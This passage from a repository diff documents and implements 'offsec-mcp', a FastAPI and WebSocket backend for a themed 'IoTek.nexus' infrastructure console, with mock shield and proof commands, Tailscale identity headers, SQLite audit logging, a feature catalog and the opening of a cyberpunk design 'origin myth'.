}
```
Response:
```json
{
"id": "cmd-174455",
"status": "ok",
"lines": [
"",
" 🕸 MESH STATUS: STABLE",
"",
" Tailnet: story-ule.ts.net",
" ..."
],
"effects": {
"nodes": 7,
"shield": { "armed": true }
}
}
```
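For reference, a small Python client that matches the contract above (it uses `requests`, which is not in requirements-mcp.txt, so treat it as an extra dependency):
```python
import requests  # pip install requests

def run_command(command: str, base_url: str = "http://localhost:8080") -> dict:
    """POST a console command to offsec-mcp and return the parsed response."""
    payload = {
        "session_id": "vaultmesh-demo-01",
        "user": "sovereign",
        "command": command,
        "args": [],
        "cwd": "/vaultmesh",
        "meta": {"client": "iotek-nexus-cli", "version": "1.0.0"},
    }
    resp = requests.post(f"{base_url}/mcp/command", json=payload, timeout=10)
    resp.raise_for_status()
    return resp.json()

print("\n".join(run_command("mesh status")["lines"]))
```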
### WebSocket /ws
Handshake:
```json
{ "type": "handshake", "session_id": "...", "user": "sovereign" }
```
Server messages:
```json
{ "type": "console.line", "line": "✓ Proof anchored", "lineType": "success" }
{ "type": "status.update", "payload": { "nodes": 7, "proofs": 1248, ... } }
{ "type": "proof.new", "proof_id": "proof_abc123" }
{ "type": "shield.event", "event": "Shield ARMED", "severity": "info" }
```
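And a minimal listener using the `websockets` package already listed in requirements-mcp.txt; it performs the handshake above and prints whatever the server pushes:
```python
import asyncio
import json
import websockets

async def listen(url: str = "ws://localhost:8080/ws") -> None:
    """Handshake, then print live messages (status.update, proof.new, shield.event, ...)."""
    async with websockets.connect(url) as ws:
        await ws.send(json.dumps({"type": "handshake",
                                  "session_id": "vaultmesh-demo-01",
                                  "user": "sovereign"}))
        async for raw in ws:
            msg = json.loads(raw)
            print(msg.get("type"), msg)

asyncio.run(listen())
```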
---
## Available Commands
| Command | Description | Backend Required |
|---------|-------------|------------------|
| `help` | Show commands | No |
| `clear` | Clear terminal | No |
| `history` | Command history | No |
| `whoami` | Current identity | No |
| `neofetch` | System info ASCII | No |
| `status` | Full dashboard | Yes |
| `mesh status` | Network topology | Yes |
| `mesh nodes` | List nodes | Yes |
| `shield status` | Defense vectors | Yes |
| `shield arm` | Arm shield | Yes |
| `shield disarm` | Disarm shield | Yes |
| `proof latest` | Recent receipts | Yes |
| `proof generate` | Create proof | Yes |
| `agents list` | Agent status | Yes |
| `oracle reason <q>` | Oracle query | Yes |
---
## Tailscale Integration
The backend extracts user identity from Tailscale headers:
```python
# In offsec_mcp.py
TAILSCALE_USER_HEADER = "X-Tailscale-User"
def extract_user(request: Request) -> str:
ts_user = request.headers.get(TAILSCALE_USER_HEADER)
if ts_user:
return ts_user.split("@")[0]
return "anonymous"
```
Deploy behind Tailscale for automatic identity:
- Bind to Tailscale IP only (`--host 100.x.x.x`)
- Or use `tailscale serve` for HTTPS with identity headers
---
## Database Schema
SQLite (`vaultmesh.db`):
```sql
-- Sessions
CREATE TABLE sessions (
id TEXT PRIMARY KEY,
user TEXT NOT NULL,
created_at TEXT NOT NULL,
last_seen_at TEXT NOT NULL,
client TEXT,
meta TEXT
);
-- Command audit log
CREATE TABLE command_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
session_id TEXT NOT NULL,
ts TEXT NOT NULL,
command TEXT NOT NULL,
status TEXT NOT NULL,
duration_ms INTEGER,
error TEXT
);
-- Events (proofs, shield, etc.)
CREATE TABLE events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
ts TEXT NOT NULL,
type TEXT NOT NULL,
payload TEXT
);
```
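Reading the audit trail back out is plain sqlite3; a quick sketch:
```python
import sqlite3

def recent_commands(db_path: str = "vaultmesh.db", limit: int = 10) -> list[dict]:
    """Return the most recent command_log entries for audit review."""
    conn = sqlite3.connect(db_path)
    conn.row_factory = sqlite3.Row
    rows = conn.execute(
        "SELECT ts, session_id, command, status, duration_ms "
        "FROM command_log ORDER BY ts DESC LIMIT ?", (limit,)
    ).fetchall()
    conn.close()
    return [dict(r) for r in rows]

for entry in recent_commands():
    print(entry["ts"], entry["command"], entry["status"])
```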
---
## Extending
### Add a new command
1. Create handler in `offsec_mcp.py`:
```python
async def cmd_my_command(req: CommandRequest) -> CommandResponse:
lines = [" Output line 1", " Output line 2"]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={}
)
```
2. Register in `COMMANDS`:
```python
COMMANDS = {
# ...existing...
"my command": cmd_my_command,
}
```
### Wire to real systems
Replace mock implementations with actual integrations:
```python
# Example: Real shield integration
async def cmd_shield_status(req: CommandRequest) -> CommandResponse:
# Call your actual shield system
shield_data = await shield_client.get_status()
lines = format_shield_output(shield_data)
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"shield": {"armed": shield_data.armed}}
)
```
---
## Deployment Options
### 1. Local development
```bash
# Terminal 1: Backend
uvicorn offsec_mcp:app --reload --port 8080
# Terminal 2: Console (or just open HTML)
python -m http.server 3000
```
### 2. Tailscale-only (recommended)
```bash
# Bind to Tailscale IP
uvicorn offsec_mcp:app --host 100.x.x.x --port 8080
# Or use tailscale serve
tailscale serve https / http://localhost:8080
```
### 3. Docker
```dockerfile
FROM python:3.11-slim
WORKDIR /app
COPY requirements-mcp.txt .
RUN pip install -r requirements-mcp.txt
COPY offsec_mcp.py .
CMD ["uvicorn", "offsec_mcp:app", "--host", "0.0.0.0", "--port", "8080"]
```
### 4. Systemd service
```ini
[Unit]
Description=offsec-mcp
After=network.target tailscaled.service
[Service]
Type=simple
User=sovereign
WorkingDirectory=/home/sovereign/vaultmesh
ExecStart=/usr/bin/uvicorn offsec_mcp:app --host 100.x.x.x --port 8080
Restart=always
[Install]
WantedBy=multi-user.target
```
---
## Files
| File | Description |
|------|-------------|
| `iotek-nexus-live.html` | Console frontend (backend-connected) |
| `offsec_mcp.py` | FastAPI backend |
| `requirements-mcp.txt` | Python dependencies |
| `vaultmesh.db` | SQLite database (auto-created) |
---
## Next Steps
1. **Wire real Tailscale** — Connect to actual `tailscale status --json`
2. **Wire real Shield** — Connect to your monitoring/defense systems
3. **Wire real Proofs** — Connect to VaultMesh proof engine
4. **Add more commands**: `scan`, `audit`, `lawchain`, etc.
5. **Add authentication** — mTLS or Tailscale identity enforcement
---
**The console is now a real control surface.**
*"They built the grid to cage us. We built the Veil to break it."*

File diff suppressed because it is too large

@@ -0,0 +1,879 @@
#!/usr/bin/env python3
"""
offsec-mcp: Sovereign MCP Backend for IoTek.nexus Console
A FastAPI backend that provides:
- HTTP command endpoint for CLI operations
- WebSocket for live status updates
- SQLite persistence for sessions and audit
- Tailscale identity integration
Run:
uvicorn offsec_mcp:app --host 0.0.0.0 --port 8080 --reload
Production (behind Tailscale):
uvicorn offsec_mcp:app --host 100.x.x.x --port 8080
"""
import asyncio
import json
import sqlite3
import subprocess
import time
import uuid
from contextlib import asynccontextmanager
from dataclasses import dataclass, asdict
from datetime import datetime, timezone
from enum import Enum
from pathlib import Path
from typing import Any, Optional
from fastapi import FastAPI, WebSocket, WebSocketDisconnect, Request, HTTPException
from fastapi.middleware.cors import CORSMiddleware
from fastapi.staticfiles import StaticFiles
from fastapi.responses import FileResponse
from pydantic import BaseModel
# ═══════════════════════════════════════════════════════════════════════════════
# CONFIGURATION
# ═══════════════════════════════════════════════════════════════════════════════
class Config:
"""Configuration - override via environment or config file."""
# Database
DB_PATH: str = "vaultmesh.db"
# Tailscale integration
TAILSCALE_ENABLED: bool = True
TAILSCALE_USER_HEADER: str = "X-Tailscale-User"
# VaultMesh paths
VAULTMESH_ROOT: Path = Path.home() / "vaultmesh"
PROOF_DIR: Path = VAULTMESH_ROOT / "proofs"
# Static files (serve console)
STATIC_DIR: Optional[Path] = None # Set to serve console HTML
# Allowed origins for CORS
CORS_ORIGINS: list = ["*"]
config = Config()
# ═══════════════════════════════════════════════════════════════════════════════
# DATABASE
# ═══════════════════════════════════════════════════════════════════════════════
def init_db():
"""Initialize SQLite database with required tables."""
conn = sqlite3.connect(config.DB_PATH)
cur = conn.cursor()
# Sessions table
cur.execute("""
CREATE TABLE IF NOT EXISTS sessions (
id TEXT PRIMARY KEY,
user TEXT NOT NULL,
created_at TEXT NOT NULL,
last_seen_at TEXT NOT NULL,
client TEXT,
meta TEXT
)
""")
# Command log
cur.execute("""
CREATE TABLE IF NOT EXISTS command_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
session_id TEXT NOT NULL,
ts TEXT NOT NULL,
command TEXT NOT NULL,
status TEXT NOT NULL,
duration_ms INTEGER,
error TEXT,
FOREIGN KEY (session_id) REFERENCES sessions(id)
)
""")
# Events table
cur.execute("""
CREATE TABLE IF NOT EXISTS events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
ts TEXT NOT NULL,
type TEXT NOT NULL,
payload TEXT
)
""")
conn.commit()
conn.close()
def get_db():
"""Get database connection."""
conn = sqlite3.connect(config.DB_PATH)
conn.row_factory = sqlite3.Row
return conn
# ═══════════════════════════════════════════════════════════════════════════════
# MODELS
# ═══════════════════════════════════════════════════════════════════════════════
class CommandRequest(BaseModel):
"""Incoming command request from console."""
session_id: str
user: str
command: str
args: list = []
cwd: str = "/vaultmesh"
meta: dict = {}
class CommandResponse(BaseModel):
"""Response to command."""
id: str
status: str
lines: list[str] = []
effects: dict = {}
error: Optional[str] = None
class WsMessage(BaseModel):
"""WebSocket message."""
type: str
payload: dict = {}
# ═══════════════════════════════════════════════════════════════════════════════
# STATE
# ═══════════════════════════════════════════════════════════════════════════════
@dataclass
class SystemState:
"""Global system state."""
nodes: int = 0
shield_armed: bool = False
proof_count: int = 0
uptime_start: float = time.time()
tailnet: str = "story-ule.ts.net"
hostname: str = "nexus"
@property
def uptime(self) -> str:
"""Human-readable uptime."""
seconds = int(time.time() - self.uptime_start)
days, rem = divmod(seconds, 86400)
hours, rem = divmod(rem, 3600)
minutes, _ = divmod(rem, 60)
if days > 0:
return f"{days}d {hours}h {minutes}m"
elif hours > 0:
return f"{hours}h {minutes}m"
else:
return f"{minutes}m"
state = SystemState()
# WebSocket connections
class ConnectionManager:
"""Manage WebSocket connections."""
def __init__(self):
self.active_connections: dict[str, WebSocket] = {}
async def connect(self, session_id: str, websocket: WebSocket):
await websocket.accept()
self.active_connections[session_id] = websocket
def disconnect(self, session_id: str):
self.active_connections.pop(session_id, None)
async def send_to(self, session_id: str, message: dict):
if session_id in self.active_connections:
await self.active_connections[session_id].send_json(message)
async def broadcast(self, message: dict):
for ws in self.active_connections.values():
try:
await ws.send_json(message)
except Exception:
pass
manager = ConnectionManager()
# ═══════════════════════════════════════════════════════════════════════════════
# COMMAND HANDLERS
# ═══════════════════════════════════════════════════════════════════════════════
async def cmd_ping(req: CommandRequest) -> CommandResponse:
"""Health check / handshake."""
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=["pong"],
effects=get_status_effects()
)
async def cmd_status(req: CommandRequest) -> CommandResponse:
"""Full system status."""
global state
lines = [
"",
" ╦ ╦╔═╗╦ ╦╦ ╔╦╗╔╦╗╔═╗╔═╗╦ ╦",
" ╚╗╔╝╠═╣║ ║║ ║ ║║║║╣ ╚═╗╠═╣",
" ╚╝ ╩ ╩╚═╝╩═╝╩ ╩ ╩╚═╝╚═╝╩ ╩",
"",
" Sovereign Infrastructure Status",
"",
f" Shield: {'● ARMED' if state.shield_armed else '○ STANDBY'}",
f" Proof: ● ACTIVE ({state.proof_count} receipts)",
f" Mesh: ● STABLE ({state.nodes} nodes)",
f" Agents: ● READY (4 configured)",
f" Oracle: ● ONLINE",
f" Lawchain: ● SYNCED",
"",
f" Uptime: {state.uptime} | Epoch: Citrinitas",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects=get_status_effects()
)
async def cmd_mesh_status(req: CommandRequest) -> CommandResponse:
"""Mesh network status."""
global state
# Try to get real Tailscale status
nodes = await get_tailscale_nodes()
state.nodes = len(nodes)
lines = [
"",
" 🕸 MESH STATUS: STABLE",
"",
f" Tailnet: {state.tailnet}",
" Protocol: WireGuard + Tailscale",
""
]
if nodes:
lines.append(" NODE TYPE STATUS LATENCY")
        lines.append(" " + "─" * 50)
for node in nodes:
status = "● online" if node.get("online") else "○ offline"
lines.append(f" {node['name']:<14} {node['type']:<8} {status:<10} {node.get('latency', '')}")
else:
lines.append(" (No nodes detected - check Tailscale status)")
lines.append("")
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"nodes": state.nodes}
)
async def cmd_shield_status(req: CommandRequest) -> CommandResponse:
"""Shield defense status."""
global state
lines = [
"",
f" 🛡 SHIELD STATUS: {'ARMED' if state.shield_armed else 'STANDBY'}",
"",
" VECTOR STATUS LAST EVENT",
" " + "" * 50,
" network ● monitoring 2s ago: normal traffic",
" wifi ● monitoring 45s ago: all clear",
" bluetooth ● monitoring 3m ago: no threats",
" usb ● monitoring 12m ago: all clear",
" process ● monitoring 1s ago: processes nominal",
" file ● monitoring 8s ago: integrity OK",
"",
" Response level: BLOCK | Dry-run: OFF",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"shield": {"armed": state.shield_armed}}
)
async def cmd_shield_arm(req: CommandRequest) -> CommandResponse:
"""Arm the shield."""
global state
state.shield_armed = True
# Log event
log_event("shield.armed", {"user": req.user})
# Broadcast to all connected clients
await manager.broadcast({
"type": "shield.event",
"event": "Shield ARMED",
"severity": "info"
})
lines = [
"",
" ⚡ Arming shield...",
" 🛡 Shield ARMED - All vectors active",
"",
" ✓ Generating proof receipt...",
f" ✓ Receipt anchored: shield_arm_{uuid.uuid4().hex[:8]}",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"shield": {"armed": True}}
)
async def cmd_shield_disarm(req: CommandRequest) -> CommandResponse:
"""Disarm the shield."""
global state
state.shield_armed = False
log_event("shield.disarmed", {"user": req.user})
await manager.broadcast({
"type": "shield.event",
"event": "Shield DISARMED",
"severity": "warning"
})
lines = [
"",
" ⚠ Disarming shield...",
" ○ Shield STANDBY - Vectors paused",
"",
f" ✓ Receipt anchored: shield_disarm_{uuid.uuid4().hex[:8]}",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"shield": {"armed": False}}
)
async def cmd_proof_latest(req: CommandRequest) -> CommandResponse:
"""Show latest proof receipts."""
global state
# Try to read real proofs
proofs = await get_latest_proofs(5)
lines = [
"",
" 📜 PROOF SYSTEM: ACTIVE",
"",
f" Total Receipts: {state.proof_count}",
f" Merkle Root: 0x{uuid.uuid4().hex[:16]}",
f" Last Anchor: 12s ago",
" Anchor Type: mesh + ots",
"",
" LATEST RECEIPTS:",
" " + "" * 50,
]
if proofs:
for p in proofs:
lines.append(f" {p['id']:<20} {p['ts']:<20} {p['type']}")
else:
lines.append(" (Generate proofs with 'proof generate')")
lines.append("")
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"proofs": state.proof_count}
)
async def cmd_proof_generate(req: CommandRequest) -> CommandResponse:
"""Generate a new proof receipt."""
global state
state.proof_count += 1
proof_id = f"proof_{uuid.uuid4().hex[:12]}"
ts = datetime.now(timezone.utc).isoformat()
# Log event
log_event("proof.generated", {"proof_id": proof_id, "user": req.user})
# Broadcast to clients
await manager.broadcast({
"type": "proof.new",
"proof_id": proof_id
})
lines = [
"",
" ⚙ Generating cryptographic proof...",
f" Action: manual_generation",
f" Timestamp: {ts}",
f" Data hash: blake3:{uuid.uuid4().hex[:32]}",
"",
f" ✓ Proof generated: {proof_id}",
f" ✓ Anchored to mesh ({state.proof_count} total)",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"proofs": state.proof_count}
)
async def cmd_agents_list(req: CommandRequest) -> CommandResponse:
"""List agent status."""
agents = [
{"name": "Sentinel", "role": "Monitor & Guard", "status": "ACTIVE", "tasks": 47},
{"name": "Orchestrator", "role": "Assign & Route", "status": "ACTIVE", "tasks": 156},
{"name": "Analyst", "role": "Interpret & Correlate", "status": "IDLE", "tasks": 0},
{"name": "Executor", "role": "Act & Apply", "status": "IDLE", "tasks": 0},
]
lines = [
"",
" AGENTS STATUS",
"",
" NAME ROLE STATUS TASKS",
" " + "" * 55,
]
for a in agents:
        status_icon = "●" if a["status"] == "ACTIVE" else "○"
lines.append(f" {a['name']:<13} {a['role']:<20} {status_icon} {a['status']:<6} {a['tasks']}")
lines.append("")
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={}
)
async def cmd_oracle_reason(req: CommandRequest) -> CommandResponse:
"""Oracle reasoning query."""
query = " ".join(req.args) if req.args else req.command.replace("oracle reason", "").strip()
lines = [
"",
" 🔮 Oracle reasoning...",
"",
f" Query: \"{query or 'system analysis'}\"",
" Analyzing context...",
" Cross-referencing Lawchain...",
"",
" ✓ Reasoning complete",
"",
" Recommendation: Continue current operational posture.",
" Confidence: HIGH | Risk: MINIMAL",
"",
f" Receipt: oracle_{uuid.uuid4().hex[:8]}",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={}
)
# Command registry
COMMANDS = {
"ping": cmd_ping,
"status": cmd_status,
"mesh status": cmd_mesh_status,
"mesh nodes": cmd_mesh_status,
"shield status": cmd_shield_status,
"shield arm": cmd_shield_arm,
"shield disarm": cmd_shield_disarm,
"proof latest": cmd_proof_latest,
"proof status": cmd_proof_latest,
"proof generate": cmd_proof_generate,
"agents list": cmd_agents_list,
}
# ═══════════════════════════════════════════════════════════════════════════════
# HELPERS
# ═══════════════════════════════════════════════════════════════════════════════
def get_status_effects() -> dict:
"""Get current status as effects payload."""
global state
return {
"nodes": state.nodes,
"shield": {"armed": state.shield_armed},
"proofs": state.proof_count,
"uptime": state.uptime,
"tailnet": state.tailnet,
"node": state.hostname
}
async def get_tailscale_nodes() -> list[dict]:
"""Get Tailscale node status."""
try:
result = subprocess.run(
["tailscale", "status", "--json"],
capture_output=True,
text=True,
timeout=5
)
if result.returncode == 0:
data = json.loads(result.stdout)
nodes = []
for peer_id, peer in data.get("Peer", {}).items():
nodes.append({
"name": peer.get("HostName", "unknown"),
"type": "PEER",
"online": peer.get("Online", False),
"latency": f"{peer.get('CurAddr', '').split(':')[0]}"
})
# Add self
if data.get("Self"):
nodes.insert(0, {
"name": data["Self"].get("HostName", "self"),
"type": "SELF",
"online": True,
"latency": "0ms"
})
return nodes
except Exception as e:
print(f"Tailscale query failed: {e}")
return []
async def get_latest_proofs(limit: int = 5) -> list[dict]:
"""Get latest proof receipts from database."""
conn = get_db()
cur = conn.cursor()
cur.execute("""
SELECT * FROM events
WHERE type LIKE 'proof.%'
ORDER BY ts DESC
LIMIT ?
""", (limit,))
rows = cur.fetchall()
conn.close()
proofs = []
for row in rows:
payload = json.loads(row["payload"]) if row["payload"] else {}
proofs.append({
"id": payload.get("proof_id", f"proof_{row['id']}"),
"ts": row["ts"][:19],
"type": row["type"]
})
return proofs
def log_event(event_type: str, payload: dict):
"""Log event to database."""
conn = get_db()
cur = conn.cursor()
cur.execute("""
INSERT INTO events (ts, type, payload)
VALUES (?, ?, ?)
""", (
datetime.now(timezone.utc).isoformat(),
event_type,
json.dumps(payload)
))
conn.commit()
conn.close()
def log_command(session_id: str, command: str, status: str, duration_ms: int, error: str = None):
"""Log command to database."""
conn = get_db()
cur = conn.cursor()
cur.execute("""
INSERT INTO command_log (session_id, ts, command, status, duration_ms, error)
VALUES (?, ?, ?, ?, ?, ?)
""", (
session_id,
datetime.now(timezone.utc).isoformat(),
command,
status,
duration_ms,
error
))
conn.commit()
conn.close()
def update_session(session_id: str, user: str, meta: dict):
"""Create or update session."""
conn = get_db()
cur = conn.cursor()
now = datetime.now(timezone.utc).isoformat()
cur.execute("SELECT id FROM sessions WHERE id = ?", (session_id,))
if cur.fetchone():
cur.execute("""
UPDATE sessions SET last_seen_at = ? WHERE id = ?
""", (now, session_id))
else:
cur.execute("""
INSERT INTO sessions (id, user, created_at, last_seen_at, client, meta)
VALUES (?, ?, ?, ?, ?, ?)
""", (
session_id,
user,
now,
now,
meta.get("client"),
json.dumps(meta)
))
conn.commit()
conn.close()
def extract_user(request: Request) -> str:
"""Extract user identity from request."""
if config.TAILSCALE_ENABLED:
ts_user = request.headers.get(config.TAILSCALE_USER_HEADER)
if ts_user:
return ts_user.split("@")[0] # Extract username from email
return "anonymous"
# ═══════════════════════════════════════════════════════════════════════════════
# FASTAPI APP
# ═══════════════════════════════════════════════════════════════════════════════
@asynccontextmanager
async def lifespan(app: FastAPI):
"""App lifespan handler."""
# Startup
init_db()
# Get initial node count
nodes = await get_tailscale_nodes()
state.nodes = len(nodes)
# Load proof count from DB
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT COUNT(*) FROM events WHERE type LIKE 'proof.%'")
state.proof_count = cur.fetchone()[0]
conn.close()
print(f"🚀 offsec-mcp started | Nodes: {state.nodes} | Proofs: {state.proof_count}")
yield
# Shutdown
print("👋 offsec-mcp shutting down")
app = FastAPI(
title="offsec-mcp",
description="Sovereign MCP Backend for IoTek.nexus",
version="1.0.0",
lifespan=lifespan
)
# CORS
app.add_middleware(
CORSMiddleware,
allow_origins=config.CORS_ORIGINS,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
# ═══════════════════════════════════════════════════════════════════════════════
# ROUTES
# ═══════════════════════════════════════════════════════════════════════════════
@app.post("/mcp/command", response_model=CommandResponse)
async def handle_command(req: CommandRequest, request: Request):
"""Handle command from console."""
start = time.time()
# Extract real user if available
ts_user = extract_user(request)
if ts_user != "anonymous":
req.user = ts_user
# Update session
update_session(req.session_id, req.user, req.meta)
# Find handler
cmd_lower = req.command.lower().strip()
handler = None
# Exact match
if cmd_lower in COMMANDS:
handler = COMMANDS[cmd_lower]
else:
# Prefix match (for commands with args like "oracle reason <query>")
for key in COMMANDS:
if cmd_lower.startswith(key):
handler = COMMANDS[key]
# Extract args from command
remaining = cmd_lower[len(key):].strip()
if remaining:
req.args = remaining.split()
break
if not handler:
duration_ms = int((time.time() - start) * 1000)
log_command(req.session_id, req.command, "error", duration_ms, "Unknown command")
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="error",
lines=[
f" Unknown command: {req.command}",
" Type 'help' for available commands."
],
error="Unknown command"
)
try:
response = await handler(req)
duration_ms = int((time.time() - start) * 1000)
log_command(req.session_id, req.command, "ok", duration_ms)
return response
except Exception as e:
duration_ms = int((time.time() - start) * 1000)
log_command(req.session_id, req.command, "error", duration_ms, str(e))
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="error",
lines=[f" Error: {str(e)}"],
error=str(e)
)
@app.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket):
"""WebSocket for live updates."""
session_id = None
try:
await websocket.accept()
# Wait for handshake
data = await websocket.receive_json()
if data.get("type") == "handshake":
session_id = data.get("session_id", str(uuid.uuid4()))
user = data.get("user", "anonymous")
# Register connection
manager.active_connections[session_id] = websocket
# Send welcome
await websocket.send_json({
"type": "status.update",
"payload": get_status_effects()
})
print(f"WS connected: {session_id} ({user})")
# Keep connection alive and handle messages
while True:
try:
msg = await asyncio.wait_for(
websocket.receive_json(),
timeout=30 # Ping every 30s
)
# Handle client messages if needed
if msg.get("type") == "ping":
await websocket.send_json({"type": "pong"})
except asyncio.TimeoutError:
# Send keepalive
await websocket.send_json({
"type": "status.update",
"payload": get_status_effects()
})
except WebSocketDisconnect:
pass
except Exception as e:
print(f"WS error: {e}")
finally:
if session_id:
manager.disconnect(session_id)
print(f"WS disconnected: {session_id}")
@app.get("/health")
async def health():
"""Health check endpoint."""
return {
"status": "ok",
"nodes": state.nodes,
"proofs": state.proof_count,
"uptime": state.uptime
}
# Serve console HTML if configured
if config.STATIC_DIR and config.STATIC_DIR.exists():
app.mount("/static", StaticFiles(directory=str(config.STATIC_DIR)), name="static")
@app.get("/")
async def serve_console():
return FileResponse(config.STATIC_DIR / "iotek-nexus-live.html")
# ═══════════════════════════════════════════════════════════════════════════════
# MAIN
# ═══════════════════════════════════════════════════════════════════════════════
if __name__ == "__main__":
import uvicorn
uvicorn.run(
"offsec_mcp:app",
host="0.0.0.0",
port=8080,
reload=True
)

@@ -0,0 +1,5 @@
# offsec-mcp dependencies
fastapi>=0.104.0
uvicorn[standard]>=0.24.0
pydantic>=2.0.0
websockets>=12.0

@@ -0,0 +1,22 @@
Global Catalog - VaultMesh Infrastructure v1.0
VM-001: Sovereign mesh network via Tailscale MagicDNS (story-ule.ts.net). (Pages 1,2,3)
VM-002: Per-node ed25519 SSH keys with IdentitiesOnly isolation. (Pages 1,2,4)
VM-003: Cryptographic proof system with Merkle tree receipts. (Pages 1,5,6)
VM-004: Multi-tier node architecture (Mine/Gate/VM/Mobile). (Pages 1,2,3)
VM-005: libvirt/KVM virtualization on brick server. (Pages 2,3)
VM-006: WireGuard exit nodes for privacy routing. (Pages 2,3)
VM-007: Cross-platform support (Arch, Debian, Android/Termux, iOS). (Pages 2,4)
VM-008: Lawchain compliance ledger integration. (Pages 5,6)
VM-009: Oracle reasoning engine with tactical chains. (Pages 5,7)
VM-010: Shield defensive monitoring system. (Pages 7,8)
VM-011: AppSec toolchain (Nuclei, Trivy, Semgrep, TruffleHog). (Pages 7,8)
VM-012: Proof anchoring (local, OTS, ETH, mesh attestation). (Pages 5,6)
VM-013: Braid protocol for foreign ledger interop. (Pages 5,6)
VM-014: MCP server integration for AI orchestration. (Pages 7,8)
VM-015: Cockpit/VNC console access for VMs. (Pages 3,4)
VM-016: SSH ControlMaster multiplexing for performance. (Pages 1,4)
VM-017: Automated key deployment via mesh-sync. (Pages 2,4)
VM-018: LAN fallback addressing when Tailscale unavailable. (Pages 1,2)
VM-019: Federation metrics and telemetry emission. (Pages 5,8)
VM-020: Agent task automation with scheduled triggers. (Pages 7,8)

File diff suppressed because it is too large

@@ -0,0 +1,349 @@
---
id: mythos-0000
title: IoTek.nexus — The Proto-Aletheia Origin Scroll
namespace: mythos
kind: origin
tags:
- origin
- iotek
- proto-vaultmesh
- hacker-dream
- nexus-veil
- mythos
status: active
epoch: Nigredo
created_at: "2050-01-01T00:00:00Z"
updated_at: "2050-01-01T00:00:00Z"
source: /mnt/data/Brand README.pdf
---
# IoTek.nexus — Proto-Aletheia Origin Myth
**The Ur-text. The first spark.**
This is where it all began — before VaultMesh, before Shield, before the Library of Aletheia. The raw hacker dream in the glow of a command prompt.
---
## IoTek.nexus — Sovereign Console Plan
### The Vibe
```
┌─────────────────────────────────────────────────────────────────┐
│ │
│ > You stand in the glow of a command prompt_ │
│ │
│ ██╗ ██████╗ ████████╗███████╗██╗ ██╗ │
│ ██║██╔═══██╗╚══██╔══╝██╔════╝██║ ██╔╝ │
│ ██║██║ ██║ ██║ █████╗ █████╔╝ │
│ ██║██║ ██║ ██║ ██╔══╝ ██╔═██╗ │
│ ██║╚██████╔╝ ██║ ███████╗██║ ██╗ │
│ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝.nexus │
│ │
│ [ neon rain falling in background ] │
│ │
│ > The grid cages you, surrounds you, surveils you — │
│ > but something cracks open: │
│ │
│ > You are not the prisoner. │
│ > You are the one holding the key._ │
│ │
└─────────────────────────────────────────────────────────────────┘
```
---
### Layout Architecture
```
┌─────────────────────────────────────────────────────────────────┐
│ ATMOSPHERE: Falling code rain (Matrix-style, but YOUR colors) │
│ - Onyx background (#0a0a0f) │
│ - Neon Emerald streams (#00ff88) │
│ - Occasional Ruby flickers (#ff0044) │
│ - Platinum glyphs (#c0c0c0) │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 1: THE BOOT SEQUENCE │
│ - Terminal window aesthetic │
│ - Typing effect: "Initializing IoTek.nexus..." │
│ - ASCII art logo reveals │
│ - Timestamp: 2050-01-01T00:00:00Z (the mythic epoch) │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 2: THE DREAM │
│ - Full-screen narrative moment │
│ - The founding text types out slowly │
│ - "You stand in the glow of a command prompt..." │
│ - Each line appears like terminal output │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 3: THE FOUR SEEDS │
│ - Grid of 4 glowing terminals │
│ │ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ PRIVACY │ │ CURIOSITY│ │
│ │ │ as creed │ │ as drive │ │
│ │ └──────────┘ └──────────┘ │
│ │ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ REBELLION│ │ CODE │ │
│ │ │as princip│ │as destiny│ │
│ │ └──────────┘ └──────────┘ │
│ │ │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 4: JOURNEY THROUGH THE NET │
│ - Animated path through layers │
│ - dark nets → encrypted tunnels → IoT whispers → satellites │
│ - Each node pulses as you scroll │
│ - Lines connect like network topology │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 5: THE NEXUS VEIL │
│ - Two columns, two veils │
│ │ │
│ │ TECHNOLOGY OF PRIVACY │ CONCEPT OF CONNECTION │
│ │ ───────────────────── │ ────────────────────── │
│ │ bending signals │ weaving IoT │
│ │ scrambling chatter │ satellites │
│ │ ghosting transmissions │ self-protecting mesh │
│ │ │ │
│ │ ↓ │ ↓ │
│ │ → Phoenix │ → VaultMesh │
│ │ → PSI │ → Aletheia │
│ │ │ │
